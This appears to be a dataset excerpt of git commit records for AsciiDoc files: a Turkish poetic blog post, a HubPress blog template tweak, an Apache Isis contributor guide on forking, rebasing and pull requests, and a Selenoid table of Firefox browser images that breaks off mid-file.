G\u00f6zya\u015flar\u0131n\u0131 da i\u00e7inde saklar.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eem'i \u00fczerlermi\u015f, yorgun b\u0131rak\u0131rlarm\u0131\u015f galiba. Be vefas\u0131z Pervane sen de durmaz kendi derdinden s\u00f6ylersin! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eeyh Galib'in duas\u0131na \"Amin!\" deriz. \n\n_\"Y\u00e2resi muht\u00e2c-\u0131 k\u00e2f\u00fbr olmas\u0131n bir kimsenin_ +\n_S\u00eeneden mehp\u00e2resi d\u00fbr olmas\u0131n bir kimsenin\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::nQh3bOwTnMg[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nEn \u00e7ok yolculuklar d\u00fc\u015f\u00fcnd\u00fcr\u00fcr insana, akl\u0131na gelmeyenler yakalar karanl\u0131\u011f\u0131n ve \u0131ss\u0131zl\u0131\u011f\u0131n ortas\u0131nda.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDilimde dua: \n\"Hata etmekten koru, us\u00fbls\u00fcz vusulden sana s\u0131\u011f\u0131nd\u0131k. Cahile yol g\u00f6ster.\" \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYazmal\u0131 m\u0131y\u0131m s\u00e2hiden? Sanki yazamad\u0131klar\u0131m\u0131 da g\u00f6nl\u00fcmden okursun. 
Oku ki kalks\u0131n sanc\u0131s\u0131 \u00fczerimden.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"c963bb735382682def05c48b302f69b0a5522aae","subject":"Update 2017-10-18-Blog-Title.adoc","message":"Update 2017-10-18-Blog-Title.adoc","repos":"chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io","old_file":"_posts\/2017-10-18-Blog-Title.adoc","new_file":"_posts\/2017-10-18-Blog-Title.adoc","new_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n:hp-tags: HubPress, Blog, Open_Source\n\n= Blog Title\n\n:hp-image: \/images\/cover-image.jpg","old_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n= Blog Title\n\n:hp-image: \/images\/cover-image.jpg","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"1fdd64e5c20a55dbc0cad80647dbc7e615a0b9d8","subject":"ISIS-2258: use AsciiDoc's footnote format to provide a footnote","message":"ISIS-2258: use AsciiDoc's footnote format to provide a footnote\n","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"antora\/components\/toc\/modules\/devguide\/pages\/contributing.adoc","new_file":"antora\/components\/toc\/modules\/devguide\/pages\/contributing.adoc","new_contents":"[[contributing]]\n= Contributing\n:notice: licensed to the apache software foundation (asf) under one or more contributor license agreements. see the notice file distributed with this work for additional information regarding copyright ownership. the asf licenses this file to you under the apache license, version 2.0 (the \"license\"); you may not use this file except in compliance with the license. you may obtain a copy of the license at. http:\/\/www.apache.org\/licenses\/license-2.0 . unless required by applicable law or agreed to in writing, software distributed under the license is distributed on an \"as is\" basis, without warranties or conditions of any kind, either express or implied. see the license for the specific language governing permissions and limitations under the license.\ninclude::_attributes.adoc[]\n:page-partial:\n\n\n\n\nThis page explains how you can contribute to Apache Isis. 
You'll probably also want to xref:toc:devguide:ide.adoc[set up your IDE] and learn xref:toc:devguide:building-apache-isis.adoc[how to build Apache Isis].\n\nThanks for considering helping out; your contributions are appreciated!\n\n\n== Recommended Workflow (github)\n\nApache Isis' source code is hosted at github (https:\/\/github.com\/apache\/isis.git[https], or ssh: `git@github.com:apache\/isis.git`).\n\nAs you might imagine, only committers are permitted to push changes to the github repo.\nAs a contributor, we recommend that you fork the https:\/\/github.com\/apache\/isis.git[apache\/isis] github repo, and then use your fork as a way of publishing your patches for the Apache Isis committers to apply.\n\nThe diagram below illustrates the process:\n\nimage::contributing\/git-workflow.png[width=\"600px\",link=\"{imagesdir}\/contributing\/git-workflow.png\"]\n\n\nThat is:\n\n. as a one-time activity, you fork the https:\/\/github.com\/apache\/isis.git[github.com\/apache\/isis] repo into your own fork on github.com\n. as a one-time activity, you clone your fork to your local computer\n. you set the https:\/\/github.com\/apache\/isis.git[github.com\/apache\/isis] as your upstream branch; this will allow you to keep your local clone up-to-date with new commits\n* note the asymmetry here: the `upstream` repo (the Apache github repo) is *not* the same as the `origin` repo (your fork).\n. you work on your changes locally; when done, you push them to your github fork\n. to contribute back a change, raise a https:\/\/issues.apache.org\/jira\/browse\/ISIS[JIRA] ticket, and ensure your commit message is in the form: `ISIS-nnnn: ...` so that changes can be tracked (more discussion on this point below). In any case, before you decide to start hacking with Apache Isis, it's always worth creating a ticket in JIRA and then having a discussion about it on the xref:toc:ROOT:support.adoc#[mailing lists].\n. Use github to raise a https:\/\/help.github.com\/articles\/using-pull-requests\/[pull request] for your feature\n. An Apache Isis committer will review your change, and apply it if suitable.\n\n\n\n\n\n\n== Setting up your fork\/clone\n\nIf you choose to create your own fork then you'll need an account on https:\/\/github.com[github.com]. You then fork simply by pressing the \"Fork\" button:\n\n\nimage::contributing\/github-forking.png[width=\"600px\",link=\"{imagesdir}\/contributing\/github-forking.png\"]\n\n\n\nAn account isn't needed if you just clone straight from the http:\/\/github.com\/apache\/isis[github.com\/apache\/isis].\n\nWhether you've forked or not, you then need to clone the repo onto your computer. Github makes this very easy to do:\n\n* for Windows users, we suggest you use github's 'Clone in Windows' feature\n* for Mac\/Linux users, create a clone from the command line:\n\nAgain, the info is easily found in the github page:\n\n\n\nimage::contributing\/github-cloning.png[width=\"600px\",link=\"{imagesdir}\/contributing\/github-cloning.png\"]\n\nIf you've created your own fork, then you need to add the `upstream` remote to the https:\/\/github.com\/apache\/isis[github.com\/apache\/isis]. This remote is traditionally called `upstream`. You should then arrange for your `master` branch to track the `upstream\/master` remote branch (a sketch of these commands is shown below):\n\nIf you didn't create your own fork, you can omit the above step. 
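\n\nIf you did fork, a minimal illustrative sketch of that one-time setup follows; the exact URL and branch names may differ in your environment:\n\n[source,bash]\n----\n# add the Apache repo as the \"upstream\" remote (one-time)\ngit remote add upstream https:\/\/github.com\/apache\/isis.git\ngit fetch upstream\n# make the local master branch track upstream\/master\ngit checkout master\ngit branch --set-upstream-to=upstream\/master\n----\n\n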
Either way around, you can now fetch new commits using simply:\n\n\n[source,bash]\n----\ngit fetch\n----\n\n\nFor more info on tracking branches, see http:\/\/git-scm.com\/book\/en\/Git-Branching-Remote-Branches[here] and http:\/\/gitready.com\/beginner\/2009\/03\/09\/remote-tracking-branches.html[here].\n\n\n\n\n\n== Commit messages\n\nAlthough with git your commits are always performed on your local repo, those commit messages become public when the patch is applied by an Apache Isis committer. You should take time to write a meaningful commit message that helps explain what the patch refers to; if you don't then there's a chance that your patch may be rejected and not applied. No-one likes hard work to go to waste!\n\nWe therefore recommend that your commit messages are as follows:footnote:[Inspiration for the recommended commit format comes from the https:\/\/github.com\/puppetlabs\/puppet[puppet] project's https:\/\/github.com\/puppetlabs\/puppet\/blob\/master\/CONTRIBUTING.md[contributing] page.]\n\n[source,other]\n----\nISIS-999: Make the example in CONTRIBUTING imperative and concrete\n\nWithout this patch applied the example commit message in the CONTRIBUTING\ndocument is not a concrete example. This is a problem because the\ncontributor is left to imagine what the commit message should look like\nbased on a description rather than an example. This patch fixes the\nproblem by making the example concrete and imperative.\n\nThe first line is a real life imperative statement with a ticket number\nfrom our issue tracker. The body describes the behavior without the patch,\nwhy this is a problem, and how the patch fixes the problem when applied.\n----\n\n\n\n\n\n\n== Creating the patch file\n\nIf you are working without a github fork of Apache Isis, then you can create the patches from your own local git repository.\n\nAs per http:\/\/stackoverflow.com\/questions\/6658313\/generate-a-git-patch-for-a-specific-commit[this stackoverflow question], create the patch using `git format-patch`:\n\n[source,bash]\n----\ngit format-patch -10 HEAD --stdout > 0001-last-10-commits.patch\n----\n\nHere `-10` means the last 10 commits you have made; change that integer according to the number of commits you need to include in the patch.\n\n\n\n\n== Sample Contribution Workflow\n\nAssuming your development environment is all set up, let's walk through how you might contribute a patch. In this example, suppose that you've decided to work on JIRA ticket #123, an enhancement to support Blob\/Clob datatypes.\n\n=== Update your master branch\n\nThe first thing to do is to make sure your local clone is up-to-date. We do this by retrieving new commits from the upstream repo and then merging them as a fast-forward into your local branch.\n\nIrrespective of whether you are using a github fork, the upstream for your local `master` branch will be tracking the appropriate remote's `master` branch. So in either case, the same commands work (sketched below):\n\nAlternatively, you can combine the `git fetch` and `git merge` and just use `git pull`:\n\n[source,bash]\n----\ngit checkout master\ngit pull --ff-only\n----\n\nIf the `merge` or `pull` fails, it means that you must have made commits and there have been changes meanwhile on the remote `master`'s branch. You can use `gitk --all` to confirm.
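\n\nFor reference, here is an illustrative sketch of the fetch-and-merge commands referred to above (assuming the `upstream` remote set up earlier; substitute `origin` if you cloned the Apache repo directly):\n\n[source,bash]\n----\n# update local master with a fast-forward merge only\ngit checkout master\ngit fetch upstream\ngit merge --ff-only upstream\/master\n----\n\n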
If the fast-forward fails, see our xref:_dg_git-cookbook.adoc#[git cookbook] page for a procedure to retrospectively sort out this situation.\n\n\n\n=== Create a topic branch\n\nWe recommend you name topic branches by the JIRA ticket, i.e. `ISIS-nnn-description`. So let's create a new branch based off `master` and call it \"ISIS-123-blobs\".\n\nYou can confirm the branch is there and is your new `HEAD` using `gitk --all`. Alternatively, use the command line:\n\n\n[source,bash]\n----\n$ git checkout -b ISIS-123-blobs\n----\n\n\nThe command line prompt should also indicate you are on a branch, isolated from any changes that might happen on the `master` branch.\n\n=== Make File Changes and Commit\n\nNext, make changes to your files using the usual commands (see also our xref:toc:devguide:git-cookbook.adoc[git cookbook] section):\n\n* `git add`\n* `git mv`\n* `git rm`\n* `git commit`\n* `git status`\n\nand so on.\n\nContinue this way until happy with the change. Remember to run all your tests on the topic branch (including a full `mvn clean install`).\n\n\n\n\n=== Rebasing with `master`\n\nBefore you can share your change, you should rebase (in other words replay) your changes on top of the `master` branch.\n\nThe first thing to do is to pull down any changes made in the upstream remote's `master` since you started your topic branch:\n\nThese are the same commands that you would have run before you created your topic branch. If you use `gitk --all`, there's a good chance that new commits have come in.\n\nNext, we reintegrate our topic branch by rebasing onto `master`:\n\n[source,bash]\n----\ngit checkout ISIS-123-blobs\ngit rebase master\n----\n\nThis takes all of the commits in your branch, and applies them on top of the new `master` branch. When your change is eventually integrated back in, it will result in a nice clear linear history on the public repo.\n\nIf the rebase fails because of a conflict, then you'll be dumped into REBASE mode. Edit the file that has the conflict, make the appropriate edits, then stage the fix and continue the rebase with `git rebase --continue`.\n\nOnce the rebase has completed, re-run your tests to confirm that everything is still good.\n\n\n\n=== Raising a pull request\n\nIf you have your own fork, you can now simply push the changes you've made locally to your fork (see the sketch below):\n\nThis will create a corresponding branch in the remote github repo. If you use `gitk --all`, you'll also see a `remotes\/origin\/ISIS-123-blobs` branch.\n\nThen, use github to raise a https:\/\/help.github.com\/articles\/using-pull-requests\/[pull request]. Pull requests sent to the Apache GitHub repositories will forward a pull request e-mail to the xref:toc:ROOT:support.adoc#[dev mailing list]. 
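\n\nAs promised, an illustrative sketch of that push, using the example branch name from above:\n\n[source,bash]\n----\n# publish the topic branch to your fork\ngit push -u origin ISIS-123-blobs\n----\n\n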
You'll probably want to sign up to the dev mailing list first before issuing your first pull request (though that isn't mandatory).\n\nThe process to raise the pull request, broadly speaking:\n\n* Open a web browser to your github fork of isis\n* Select your topic branch (pushed in the previous step) so that the pull request references the topic branch.\n* Click the `Pull Request` button.\n* Check that the Apache Isis mailing list email came through.\n\n\n\n== If your pull request is accepted\n\nTo double check that your pull request is accepted, update your `master` branch from the `upstream` remote:\n\nYou can then use `gitk --all` (or `git log` if you prefer the command line) to check your contribution has been added.\n\nYou can now delete your topic branch and remove the branch in your github:\n\nFinally, you might want to push the latest changes in master back up to your github fork. If so, use:\n\n\n\n=== If your pull request is rejected\n\nIf your pull request is rejected, then you'll need to update your branch from the main repository and then address the rejection reason.\n\nYou'll probably also want to remove the remote branch on github:\n\n[source,bash]\n----\ngit push origin --delete ISIS-123-blobs\n----\n\n\n\u2026 and continue as before until you are ready to resubmit your change.\n","old_contents":"[[contributing]]\n= Contributing\n:notice: licensed to the apache software foundation (asf) under one or more contributor license agreements. see the notice file distributed with this work for additional information regarding copyright ownership. the asf licenses this file to you under the apache license, version 2.0 (the \"license\"); you may not use this file except in compliance with the license. you may obtain a copy of the license at. http:\/\/www.apache.org\/licenses\/license-2.0 . unless required by applicable law or agreed to in writing, software distributed under the license is distributed on an \"as is\" basis, without warranties or conditions of any kind, either express or implied. see the license for the specific language governing permissions and limitations under the license.\ninclude::_attributes.adoc[]\n:page-partial:\n\n\n\n\nThis page explains how you can contribute to Apache Isis. You'll probably also want xref:toc:devguide:ide.adoc[set up your IDE] and learn xref:toc:devguide:building-apache-isis.adoc[how to build Apache Isis].\n\nThanks for considering to help out, your contributions are appreciated!\n\n\n== Recommended Workflow (github)\n\nApache Isis' source code is hosted in at github (https:\/\/github.com\/apache\/isis.git[https], or ssh: `git@github.com:apache\/isis.git`).\n\nAs you might imagine, only committers are permitted to push changes to the github repo.\nAs a contributor, we recommend that you fork the https:\/\/github.com\/apache\/isis.git[apache\/isis] github repo, and then use your fork as a way of publishing your patches for the Apache Isis committers to apply.\n\nThe diagram below illustrates the process:\n\nimage::contributing\/git-workflow.png[width=\"600px\",link=\"{imagesdir}\/contributing\/git-workflow.png\"]\n\n\nThat is:\n\n. as a one-time activity, you fork the https:\/\/github.com\/apache\/isis.git[github.com\/apache\/isis] repo into your own fork on github.com\n. as a one-time activity, you clone your fork to your local computer\n. 
you set the https:\/\/github.com\/apache\/isis.git[github.com\/apache\/isis] as your upstream branch; this will allow you to keep your local clone up-to-date with new commits\n* note the asymmetry here: the `upstream` repo (the Apache github repo) is *not* the same as the `origin` repo (your fork).\n. you work on your changes locally; when done, you push them to your github fork\n. to contribute back a change, raise a https:\/\/issues.apache.org\/jira\/browse\/ISIS[JIRA] ticket, and ensure your commit message is in the form: `ISIS-nnnn: ...` so that changes can be tracked (more discussion on this point below). In any case, before you decide to start hacking with Apache Isis, it's always worth creating a ticket in JIRA and then have a discussion about it on the xref:toc:ROOT:support.adoc#[mailing lists].\n. Use github to raise a https:\/\/help.github.com\/articles\/using-pull-requests\/[pull request] for your feature\n. An Apache Isis committer will review your change, and apply it if suitable.\n\n\n\n\n\n\n== Setting up your fork\/clone\n\nIf you choose to create your own fork then you'll need an account on https:\/\/github.com[github.com]. You then fork simply by pressing the \"Fork\" button:\n\n\nimage::contributing\/github-forking.png[width=\"600px\",link=\"{imagesdir}\/contributing\/github-forking.png\"]\n\n\n\nAn account isn't needed if you just clone straight from the http:\/\/github.com\/apache\/isis[github.com\/apache\/isis].\n\nWhether you've forked or not, you then need to clone the repo onto your computer. Github makes this very easy to do:\n\n* for Windows users, we suggest you use github's 'Clone in Windows' feature\n* for Mac\/Linux users, create a clone from the command line:\n\nAgain, the info is easily found in the github page:\n\n\n\nimage::contributing\/github-cloning.png[width=\"600px\",link=\"{imagesdir}\/contributing\/github-cloning.png\"]\n\nIf you've created your own fork, then you need to add the `upstream` remote to the https:\/\/github.com\/apache\/isis[github.com\/apache\/isis]. This remote is traditionally called `upstream`. You should then arrange for your `master` branch to track the `upstream\/master` remote branch:\n\nIf you didn't create your own fork, you can omit the above step. Either way around, you can now fetch new commits using simply:\n\n\n[source,bash]\n----\ngit fetch\n----\n\n\nFor more info on tracking branches http:\/\/git-scm.com\/book\/en\/Git-Branching-Remote-Branches[here] and http:\/\/gitready.com\/beginner\/2009\/03\/09\/remote-tracking-branches.html[here].\n\n\n\n\n\n== Commit messages\n\nAlthough with git your commits are always performed on your local repo, those commit messages become public when the patch is applied by an Apache Isis committer. You should take time to write a meaningful commit message that helps explain what the patch refers to; if you don't then there's a chance that your patch may be rejected and not applied. No-one likes hard work to go to waste!\n\nWe therefore recommend that your commit messages are as follows [1]:\n\n[source,other]\n----\nISIS-999: Make the example in CONTRIBUTING imperative and concrete\n\nWithout this patch applied the example commit message in the CONTRIBUTING\ndocument is not a concrete example. This is a problem because the\ncontributor is left to imagine what the commit message should look like\nbased on a description rather than an example. 
This patch fixes the\nproblem by making the example concrete and imperative.\n\nThe first line is a real life imperative statement with a ticket number\nfrom our issue tracker. The body describes the behavior without the patch,\nwhy this is a problem, and how the patch fixes the problem when applied.\n----\n\n\n\n\n\n\n== Creating the patch file\n\nIf you are working without a github fork of Apache Isis, then you can create the patches from your own local git repository.\n\nAs per http:\/\/stackoverflow.com\/questions\/6658313\/generate-a-git-patch-for-a-specific-commit[this stackoverflow question], create the patch using `git format-patch`:\n\n[source,bash]\n----\ngit format-patch -10 HEAD --stdout > 0001-last-10-commits.patch\n----\n\nHere `-10` is the last 10 commits you have done. You need to change that integer according to the commits you need to apply into the patch.\n\n\n\n\n== Sample Contribution Workflow\n\nAssuming you're development environment is all setup, let's walk through how you might make contribute a patch. In this example, suppose that you've decided to work on JIRA ticket #123, an enhancement to support Blob\/Clob datatypes.\n\n=== Update your master branch\n\nThe first thing to do is to make sure your local clone is up-to-date. We do this by retrieving new commits from upstream repo and then merging them as a fast-forward into your local branch.\n\nIrrespective of whether you are using a github fork, the upstream for your local `master` branch will be tracking the appropriate remote's `master` branch. So n either case, the same commands work:\n\nAlternatively, you can combine the `git fetch` and `git merge` and just use `git pull`:\n<pre>\ngit checkout master\ngit pull \u2013ff-only\n<\/pre>\n\nIf the `merge` or `pull` fails, it means that you must have made commits and there have been changes meanwhile on the remote `master`'s branch. You can use `gitk --all` to confirm. If this fails, see our xref:_dg_git-cookbook.adoc#[git cookbook] page for a procedure to retrospectively sort out this situation.\n\n\n\n=== Create a topic branch\n\nWe recommend you name topic branches by the JIRA ticket, ie <tt>ISIS-nnn-description<\/tt>. So let's create a new branch based off `master` and call it \"ISIS-123-blobs\"\n\nYou can confirm the branch is there and is your new `HEAD` using either `gitk --all`. Alternatively, use the command line:\n\n\n[source,bash]\n----\n$ git checkout -b ISIS-123-blobs\n----\n\n\nThe command line prompt should also indicate you are on a branch, isolated from any changes that might happen on the `master` branch.\n\n=== Make File Changes and Commit\n\nNext, make changes to your files using the usual commands (see also our xref:toc:devguide:git-cookbook.adoc[git cookbook] section):\n\n* `git add`\n* `git mv`\n* `git rm`\n* `git commit`\n* `git status`\n\nand so on.\n\nContinue this way until happy with the change. Remember to run all your tests on the topic branch (including a full `mvn clean install`).\n\n\n\n\n=== Rebasing with `master`\n\nBefore you can share your change, you should rebase (in other words replay) your changes on top of the `master` branch.\n\nThe first thing to do is to pull down any changes made in upstream remote's `master` since you started your topic branch:\n\nThese are the same commands that you would have run before you created your topic branch. 
If you use `gitk --all`, there's a good chance that new commits have come in.\n\nNext, we reintegrate our topic branch by rebasing onto `master`:\n<pre>\ngit checkout ISIS-123-blobs\ngit rebase master\n<\/pre>\n\nThis takes all of the commits in your branch, and applies them on top of the new `master` branch. When your change is eventually integrated back in, it will result in a nice clear linear history on the public repo.\n\nIf the rebase fails because of a conflict, then you'll be dumped into REBASE mode. Edit the file that has the conflict, and make the appropriate edits. Once done:\n\nOnce the rebase has completed, re-run your tests to confirm that everything is still good.\n\n\n\n=== Raising a pull request\n\nIf you have your own fork, you can now simply push the changes you've made locally to your fork:\n\nThis will create a corresponding branch in the remote github repo. If you use `gitk --all`, you'll also see a `remotes\/origin\/ISIS-123-blobs` branch.\n\nThen, use github to raise a https:\/\/help.github.com\/articles\/using-pull-requests\/[pull request]. Pull requests sent to the Apache GitHub repositories will forward a pull request e-mail to the xref:toc:ROOT:support.adoc#[dev mailing list]. You'll probably want to sign up to the dev mailing list first before issuing your first pull request (though that isn't mandatory).\n\nThe process to raise the pull request, broadly speaking:\n\n* Open a web browser to your github fork of isis\n* Select your topic branch (pushed in the previous step) so that the pull request references the topic branch.\n* Click the `Pull Request` button.\n* Check that the Apache Isis mailing list email came through.\n\n\n\n== If your pull request is accepted\n\nTo double check that your pull request is accepted, update your `master` branch from the `upstream` remote:\n\nYou can then use `gitk --all` (or `git log` if you prefer the command line) to check your contribution has been added.\n\nYou can now delete your topic branch and remove the branch in your github:\n\nFinally, you might want to push the latest changes in master back up to your github fork. 
If so, use:\n\n\n\n=== If your pull request is rejected\n\nIf your pull request is rejected, then you'll need to update your branch from the main repository and then address the rejection reason.\n\nYou'll probably also want to remove the remote branch on github:\n\n[source,bash]\n----\ngit push origin \u2013delete ISIS-123-blobs\n----\n\n\n\u2026 and continue as before until you are ready to resubmit your change.\n\n[1] inspiration for the recommended commit format comes from the https:\/\/github.com\/puppetlabs\/puppet[puppet] project's https:\/\/github.com\/puppetlabs\/puppet\/blob\/master\/CONTRIBUTING.md[contributing] page.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ed4eedc5909fe6d4b2f23b1fbdabb1467b8e22b2","subject":"Updated browser image information to reflect Firefox image changes","message":"Updated browser image information to reflect Firefox image changes\n","repos":"aerokube\/selenoid,aerokube\/selenoid,vania-pooh\/selenoid,aandryashin\/selenoid,vania-pooh\/selenoid,aandryashin\/selenoid","old_file":"docs\/browser-image-information.adoc","new_file":"docs\/browser-image-information.adoc","new_contents":"== Browser Image information\n=== Firefox\n\n.Firefox Images with Selenium Server\n|===\n| Image | VNC Image | Selenium Version | Firefox Version | Client Version\n\n| selenoid\/firefox:3.6 | selenoid\/vnc:firefox_3.6 | 2.20.0 | 3.6.16 i386 (dialogs may not work) .7+<.^|\n**Java:** 2.53.1 and below\n**Python:** not supported\n**selenium-webdriver.js:** not supported\n| selenoid\/firefox:4.0 | selenoid\/vnc:firefox_4.0 | 2.20.0 | 4.0.1 i386\n| selenoid\/firefox:5.0 | selenoid\/vnc:firefox_5.0 | 2.20.0 | 5.0.1 i386\n| selenoid\/firefox:6.0 | selenoid\/vnc:firefox_6.0 | 2.20.0 | 6.0.2 i386\n| selenoid\/firefox:7.0 | selenoid\/vnc:firefox_7.0 | 2.20.0 | 7.0.1 i386\n| selenoid\/firefox:8.0 | selenoid\/vnc:firefox_8.0 | 2.20.0 | 8.0.1 i386\n| selenoid\/firefox:9.0 | selenoid\/vnc:firefox_9.0 | 2.20.0 | 9.0.1\n| selenoid\/firefox:10.0 | selenoid\/vnc:firefox_10.0 | 2.32.0 | 10.0.2 .13+<.^|\n**Java:** any modern version\n**Python:** not supported\n**selenium-webdriver.js:** not supported\n| selenoid\/firefox:11.0 | selenoid\/vnc:firefox_11.0 | 2.32.0 | 11.0\n| selenoid\/firefox:12.0 | selenoid\/vnc:firefox_12.0 | 2.32.0 | 12.0\n| selenoid\/firefox:13.0 | selenoid\/vnc:firefox_13.0 | 2.32.0 | 13.0\n| selenoid\/firefox:14.0 | selenoid\/vnc:firefox_14.0 | 2.32.0 | 14.0.1\n| selenoid\/firefox:15.0 | selenoid\/vnc:firefox_15.0 | 2.32.0 | 15.0.1\n| selenoid\/firefox:16.0 | selenoid\/vnc:firefox_16.0 | 2.32.0 | 16.0.2\n| selenoid\/firefox:17.0 | selenoid\/vnc:firefox_17.0 | 2.32.0 | 17.0.1\n| selenoid\/firefox:18.0 | selenoid\/vnc:firefox_18.0 | 2.32.0 | 18.0.2\n| selenoid\/firefox:19.0 | selenoid\/vnc:firefox_19.0 | 2.32.0 | 19.0.2\n| selenoid\/firefox:20.0 | selenoid\/vnc:firefox_20.0 | 2.32.0 | 20.0\n| selenoid\/firefox:21.0 | selenoid\/vnc:firefox_21.0 | 2.32.0 | 21.0\n| selenoid\/firefox:22.0 | selenoid\/vnc:firefox_22.0 | 2.32.0 | 22.0\n| selenoid\/firefox:23.0 | selenoid\/vnc:firefox_23.0 | 2.35.0 | 23.0.1 .30+<.^| Any modern client version\n| selenoid\/firefox:24.0 | selenoid\/vnc:firefox_24.0 | 2.39.0 | 24.0\n| selenoid\/firefox:25.0 | selenoid\/vnc:firefox_25.0 | 2.39.0 | 25.0.1\n| selenoid\/firefox:26.0 | selenoid\/vnc:firefox_26.0 | 2.39.0 | 26.0\n| selenoid\/firefox:27.0 | selenoid\/vnc:firefox_27.0 | 2.40.0 | 27.0.1\n| selenoid\/firefox:28.0 | selenoid\/vnc:firefox_28.0 | 2.41.0 | 28.0\n| selenoid\/firefox:29.0 | selenoid\/vnc:firefox_29.0 | 
2.43.1 | 29.0.1\n| selenoid\/firefox:30.0 | selenoid\/vnc:firefox_30.0 | 2.43.1 | 30.0 \n| selenoid\/firefox:31.0 | selenoid\/vnc:firefox_31.0 | 2.44.0 | 31.0 \n| selenoid\/firefox:32.0 | selenoid\/vnc:firefox_32.0 | 2.44.0 | 32.0.3 \n| selenoid\/firefox:33.0 | selenoid\/vnc:firefox_33.0 | 2.44.0 | 33.0.3 \n| selenoid\/firefox:34.0 | selenoid\/vnc:firefox_34.0 | 2.45.0 | 34.0.5 \n| selenoid\/firefox:35.0 | selenoid\/vnc:firefox_35.0 | 2.45.0 | 35.0.1 \n| selenoid\/firefox:36.0 | selenoid\/vnc:firefox_36.0 | 2.45.0 | 36.0.1 \n| selenoid\/firefox:37.0 | selenoid\/vnc:firefox_37.0 | 2.45.0 | 37.0.2 \n| selenoid\/firefox:38.0 | selenoid\/vnc:firefox_38.0 | 2.45.0 | 38.0.5 \n| selenoid\/firefox:39.0 | selenoid\/vnc:firefox_39.0 | 2.45.0 | 39.0.3 \n| selenoid\/firefox:40.0 | selenoid\/vnc:firefox_40.0 | 2.45.0 | 40.0.3 \n| selenoid\/firefox:41.0 | selenoid\/vnc:firefox_41.0 | 2.45.0 | 41.0.2 \n| selenoid\/firefox:42.0 | selenoid\/vnc:firefox_42.0 | 2.47.1 | 42.0 \n| selenoid\/firefox:43.0 | selenoid\/vnc:firefox_43.0 | 2.53.1 | 43.0.4 \n| selenoid\/firefox:44.0 | selenoid\/vnc:firefox_44.0 | 2.53.1 | 44.0.2 \n| selenoid\/firefox:45.0 | selenoid\/vnc:firefox_45.0 | 2.53.1 | 45.0.2 \n| selenoid\/firefox:46.0 | selenoid\/vnc:firefox_46.0 | 2.53.1 | 46.0.1 \n| selenoid\/firefox:47.0 | selenoid\/vnc:firefox_47.0 | 2.53.1 | 47.0.1 \n| selenoid\/firefox:48.0 | selenoid\/vnc:firefox_48.0 | 3.2.0 + GD 0.13.0 | 48.0.2 (native events and proxies don't work) \n| selenoid\/firefox:49.0 | selenoid\/vnc:firefox_49.0 | 3.2.0 + GD 0.13.0 | 49.0.2 (native events and switching between windows don't work) \n| selenoid\/firefox:50.0 | selenoid\/vnc:firefox_50.0 | 3.2.0 + GD 0.13.0 | 50.0.2 (native events, switching windows and proxies don't work) \n| selenoid\/firefox:51.0 | selenoid\/vnc:firefox_51.0 | 3.2.0 + GD 0.14.0 | 51.0.1 (native events, switching windows and proxies don't work) \n| selenoid\/firefox:52.0 | selenoid\/vnc:firefox_52.0 | 3.3.1 + GD 0.15.0 | 52.0.2 (native events, switching windows don't work; proxy capability format could change) \n|===\n\nWARNING: Firefox images below require Selenium client 3.4.0 